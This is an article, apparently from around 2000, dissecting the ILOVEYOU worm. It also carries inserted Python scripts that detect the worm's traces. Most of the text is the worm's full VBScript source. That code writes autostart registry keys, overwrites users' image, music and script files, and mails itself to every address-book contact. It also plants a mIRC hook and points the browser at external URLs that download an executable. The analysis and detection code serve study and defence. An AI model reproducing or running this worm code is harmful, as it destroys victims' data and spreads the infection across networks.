Dissecting the worm

Sneaking in

On Thursday, May 4, 2000, a new worm hit the net. It arrived in an e-mail with the subject “ILOVEYOU”. Within hours, mail servers were paralyzed and whole networks of PCs crashed (including those of many an administrative authority or bank).

The mail itself told you to open the attachment containing a love letter. The attachment’s name was “LOVE-LETTER-FOR-YOU.TXT.vbs”. Once opened, the mayhem started: first your system settings were changed, then the worm was sent on to new victims, and finally your most beloved image and music files were killed off.

Dissection

As already mentioned, the name of the attached file was “LOVE-LETTER-FOR-YOU.TXT.vbs”. The extension “.vbs” marks an MS Visual Basic script. What follows is the complete source code of the script (the preformatted passages).

rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines

The head of the worm, containing some info about the author. On Friday I had a sour laugh reading in the newspapers that some “experts” “assume” the “virus” originates from the Philippines and comes from a schoolboy. I am not much of an expert, but it really doesn’t take one to read those first two lines.

OTOH, what obviously takes more than an “expert” is the ability to distinguish between a worm and a virus. “ILOVEYOU” is not a virus but a worm: only a worm can spread to other computers without human aid.

On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"

When I got this mail, I instantly became suspicious. I downloaded the attachment from my IMAP server and renamed the file by removing the .vbs extension. Then I opened it in SimpleText on a Mac (pretty similar to Windows WordPad, except that it won’t crash). Scrolling through the file, these lines changing registry settings confirmed two things: first, that I definitely had something more than a love letter on my hands, and second, that it won’t run on anything other than Win9x & co. (neither MacOS nor Linux nor FreeBSD nor BeOS nor OS/2 uses a registry of this kind).

end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")

Great. Your most often used system files get neighbours with disturbingly similar names…

c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"

Even worse… through some rerouting in the registry, they even replace the original ones.

downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"

This section configures Internet Explorer so that, at its next start, it fetches a program you wouldn’t really want to get (WIN-BUGSFIX.exe, registered to run at every boot once it exists) – and once you’ve got it, the IE start page is changed back to about:blank so you won’t even consider that something has happened.
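As an added example (not part of the original article, and not the worm’s code): the autostart and start-page entries written above are easy to spot in a registry export. The Python script below parses the text format regedit exports and flags Run/RunServices values that launch a script file at boot, values named like the worm’s, and an Internet Explorer start page that points at an executable. The export it scans is constructed for illustration; the hostname in it is a placeholder, not the real download location.

```python
"""Flag worm-style autostart and browser-hijack entries in a .reg export.
Added example, not code from the article or the worm; the export text is constructed."""
import re
from typing import List, Tuple

AUTOSTART_KEY_SUFFIXES = (
    r"\microsoft\windows\currentversion\run",
    r"\microsoft\windows\currentversion\runservices",
)
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsh", ".sct", ".hta")
# Value names the worm writes (taken from the source above); matched case-insensitively.
WORM_VALUE_NAMES = {"mskernel32", "win32dll", "win-bugsfix"}

# Constructed sample in regedit's export format. The hostname is a placeholder.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"MSKernel32"="C:\\WINDOWS\\SYSTEM\\MSKernel32.vbs"
"WIN-BUGSFIX"="c:\\WIN-BUGSFIX.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Win32DLL"="C:\\WINDOWS\\Win32DLL.vbs"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.example.invalid/placeholder/WIN-BUGSFIX.exe"
'''


def parse_reg_export(text: str) -> List[Tuple[str, str, str]]:
    """Return (key, value name, value data) for every string value in .reg text."""
    entries, key = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = re.match(r'^"([^"]+)"="(.*)"$', line)
        if m and key:
            # .reg files escape every backslash as "\\"; undo that.
            entries.append((key, m.group(1), m.group(2).replace("\\\\", "\\")))
    return entries


def scan_reg_export(text: str) -> List[Tuple[str, str, str]]:
    """Return (key, value name, reason) for every suspicious entry."""
    findings = []
    for key, name, data in parse_reg_export(text):
        k, n, d = key.lower(), name.lower(), data.lower()
        if k.endswith(AUTOSTART_KEY_SUFFIXES):
            if d.endswith(SCRIPT_EXTS):
                findings.append((key, name, "script file launched at every boot"))
            elif n in WORM_VALUE_NAMES:
                findings.append((key, name, "autostart value named like the worm's"))
        elif k.endswith(r"\internet explorer\main") and n == "start page":
            if d.endswith(".exe"):
                findings.append((key, name, "IE start page points at an executable"))
    return findings


if __name__ == "__main__":
    for key, name, reason in scan_reg_export(SAMPLE_REG_EXPORT):
        print(f"{reason}: [{key}] {name}")
```

A script interpreter in an autostart key is the signal worth alerting on regardless of the value name; the name list only catches this particular worm, while the extension check catches the technique.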

end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if

This is maybe the meanest part of the procedure. All the pictures and music you’ve downloaded are written over with the worm, and when opened they will recreate the worm on your Windows-based PC (even if you’ve already removed it from your system).
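An added example, not from the article and not the worm’s code: a Python sweep that walks a directory tree and reports the traces this routine leaves behind, namely the dropped file names, the `.jpg.vbs` / `.mp3.vbs` double extensions, script files that begin with the worm’s `rem barok` header line, and a mIRC `script.ini` carrying a DCC send hook. The demo tree it builds contains stub files constructed for the test, not the worm body.

```python
"""Sweep a directory tree for the file-system traces left by this routine.
Added example, not code from the article or the worm; the demo tree is constructed."""
import os
import tempfile
from typing import List, Tuple

WORM_HEADER = "rem barok -loveletter"   # first line of the script, as quoted above
DROPPED_NAMES = {"mskernel32.vbs", "win32dll.vbs",
                 "love-letter-for-you.htm", "love-letter-for-you.txt.vbs"}
# Extensions the routine overwrites or shadows with a .vbs copy (plus .txt for the decoy name).
SHADOWED_EXTS = {"jpg", "jpeg", "mp3", "mp2", "js", "jse", "css", "wsh", "sct", "hta", "txt"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".css", ".wsh", ".sct", ".hta")


def double_extension(name: str) -> str:
    """Return the inner extension hidden by a trailing .vbs/.vbe ('photo.jpg.vbs' -> 'jpg'), else ''."""
    parts = name.lower().rsplit(".", 2)
    if len(parts) == 3 and parts[2] in ("vbs", "vbe") and parts[1] in SHADOWED_EXTS:
        return parts[1]
    return ""


def sweep(root: str) -> List[Tuple[str, str]]:
    """Return (path, reason) for every suspicious file under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            path, low = os.path.join(dirpath, fname), fname.lower()
            if low in DROPPED_NAMES:
                findings.append((path, "file name dropped by the worm"))
            inner = double_extension(fname)
            if inner:
                findings.append((path, f"double extension shadowing a .{inner} file"))
            if low == "script.ini":
                with open(path, errors="replace") as fh:
                    if "dcc send" in fh.read().lower():
                        findings.append((path, "mIRC script.ini with a DCC send hook"))
            if low.endswith(SCRIPT_EXTS):
                with open(path, errors="replace") as fh:
                    if fh.read(64).lower().startswith(WORM_HEADER):
                        findings.append((path, "worm body (starts with its rem header)"))
    return findings


def build_demo_tree() -> str:
    """Create a temp tree of constructed stub files (no worm code) and return its path."""
    root = tempfile.mkdtemp(prefix="sweepdemo-")
    stub = WORM_HEADER + "(vbe) stub for the demo, not the real script\r\n"
    files = {
        "pictures/holiday.jpg.vbs": stub,                 # overwritten picture
        "music/song.mp3.vbs": stub,                       # shadow copy next to the mp3
        "music/song.mp3": "ID3 constructed audio stub",   # original, merely hidden on a real victim
        "mirc/script.ini": "[script]\nn2= /.dcc send $nick C:\\x.htm\n",
        "docs/readme.txt": "plain text, nothing to see",
        "docs/notes.vbs": "' my own harmless script\nWScript.Echo 1\n",
    }
    for rel, content in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for path, reason in sweep(build_demo_tree()):
        print(f"{reason}: {path}")
```

Note that on a real victim the `.mp3` originals survive with the hidden attribute set, while the `.jpg` originals are deleted, so a sweep should report the shadow copies rather than assume the media is gone.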

if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script...
mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect
and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if

Obviously, the author of the worm has something against mIRC. Personal vendetta?

next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next

The section above is responsible for sending a mail (“male”) to every entry in your address book. With some large companies, that means thousands of new victims.
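Added example, not part of the article and not the worm’s code: what a mail-gateway rule for this propagation pattern looks like in Python. It flags the subject the worm uses and any attachment that is a Windows Script Host file, in particular one with a decoy double extension such as `.TXT.vbs`. The message it is run on is constructed here with the standard library; the attachment is a harmless stub.

```python
"""Mail-gateway check for the propagation pattern above.
Added example, not code from the article or the worm; the sample message is constructed."""
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser
from typing import List

SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsh", ".sct", ".hta")
WORM_SUBJECTS = {"iloveyou"}
WORM_ATTACHMENT_NAMES = {"love-letter-for-you.txt.vbs"}


def suspicious_attachment(filename: str) -> str:
    """Explain why an attachment name is suspicious, or return '' if it is not."""
    low = filename.lower()
    if low in WORM_ATTACHMENT_NAMES:
        return "attachment name used by the worm"
    if low.endswith(SCRIPT_EXTS):
        stem = low.rsplit(".", 1)[0]
        # 'photo.jpg.vbs': the decoy extension is all a user with hidden extensions sees
        if "." in stem:
            return "script attachment with a decoy double extension"
        return "Windows Script Host attachment"
    return ""


def classify(raw: bytes) -> List[str]:
    """Return the reasons to quarantine a raw RFC 822 message (empty list = clean)."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    reasons = []
    subject = str(msg["subject"] or "").strip().lower()
    if subject in WORM_SUBJECTS:
        reasons.append("subject matches the worm's")
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        why = suspicious_attachment(name)
        if why:
            reasons.append(f"{name}: {why}")
    return reasons


def build_sample() -> bytes:
    """Constructed look-alike of the worm's mail; the attachment is a harmless stub."""
    m = EmailMessage()
    m["From"] = "friend@example.invalid"
    m["To"] = "you@example.invalid"
    m["Subject"] = "ILOVEYOU"
    m.set_content("kindly check the attached LOVELETTER coming from me.")
    m.add_attachment(b"rem stub attachment, not the worm\r\n",
                     maintype="application", subtype="octet-stream",
                     filename="LOVE-LETTER-FOR-YOU.TXT.vbs")
    return m.as_bytes()


if __name__ == "__main__":
    print(classify(build_sample()))
```

The subject and file-name matches only catch this worm; the extension rule is the durable part, since a Script Host attachment arriving by mail is rarely legitimate whatever it is called.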

dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE>
<META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-?
ispyder@mail.com ?-? @GRAMMERSoft Group ?-?
Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _"<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#
;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)
@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open
(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@
BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>
"&vbcrlf& _

And that’s the letter the script sends to your acquaintances (or business partners).

"<CENTER><p>This HTML file need ActiveX Control<?-?p>
<p>To Enable to read this HTML file<BR>- Please press
#-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@
yellow@-@>----------z--------------------z----------
<?-?MARQUEE> "&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.resizeTo
(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit
"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject
@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))
"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))
"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))
"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@))
then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@
"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)
"&vbcrlf& _
"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^
-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-
^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@
"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub

That was it. A somewhat longish piece of code, but still quicker to read than to get rid of its results.


Conclusions

First of all, once again – as in the case of Melissa last year – the problem was limited to Microsoft-only platforms. Companies are speaking about damages amounting to millions of dollars, and they blame it on the – as yet unknown – author. And the next time Microsoft releases an even newer version of its Office, Windows or Internet Explorer products, these same companies will upgrade to it without asking themselves whether it’ll really be for their own good.

This blindness is simply amazing. After all, what at its core enabled Melissa to spread so fast and uncontrollably? The answer is that it was a Microsoft Word macro – thanks to Microsoft, a virus can now hide in an innocent-looking document file, so the age-old advice to be careful with executable program files (extension “.exe”) doesn’t help much any more. Still, obviously not many people realized what it means that Melissa is limited to Microsoft Word and that no other word processor will get you infected through text documents.

The “love-worm” is in many ways similar. It doesn’t use a Word macro but a Visual Basic script, another feature exclusive to MS products. The worm needs a Windows operating system to run at all, MS Internet Explorer to fetch a program (see the source code comments earlier on), and MS Outlook (Express) to pass itself on to other computers. By using an alternative OS, you’re completely safe. And even when using Windows, you’re relatively safe when using an alternative browser (e.g. Opera, Netscape Navigator) and an alternative e-mail client (e.g. Netscape Messenger, StarMail).

So who is to blame? It’s just too easy to point a finger at the first hobbyist programmer who is still going to school. Do you really want to say he is to blame for abusing a security hole Microsoft advertently created? I personally could never understand what I would need ActiveX for, why it is good that every e-mail I open can run a Visual Basic script on my computer, and why a text document needs executables (macros). Maybe it’s just my ignorance, but I decided to use Lotus SmartSuite for office applications and Netscape Communicator for web browsing and e-mail – and I haven’t caught a single virus in the last 5+ years. And that without any antivirus software.

And there is an even greater security hole in Windows itself, one that nobody’s going to tell me Microsoft created inadvertently: I mean the default setting of Win9x not displaying file extensions. Thus even a professional – when not fully concentrating – can fall for such a trick. Or do you want to tell me that when you see a file ending in “.txt”, your very first thought is automatically “this Windows installation hasn’t been adjusted to display file extensions, so this .txt ending is rather suspicious”?

In this case, “experts” once again told us to get an antivirus program. What for? Isn’t it obvious the worm slipped through all antivirus protection? Rather get rid of your unsafe applications, and you’ll be able to sleep without worrying about some virus or worm destroying your data.
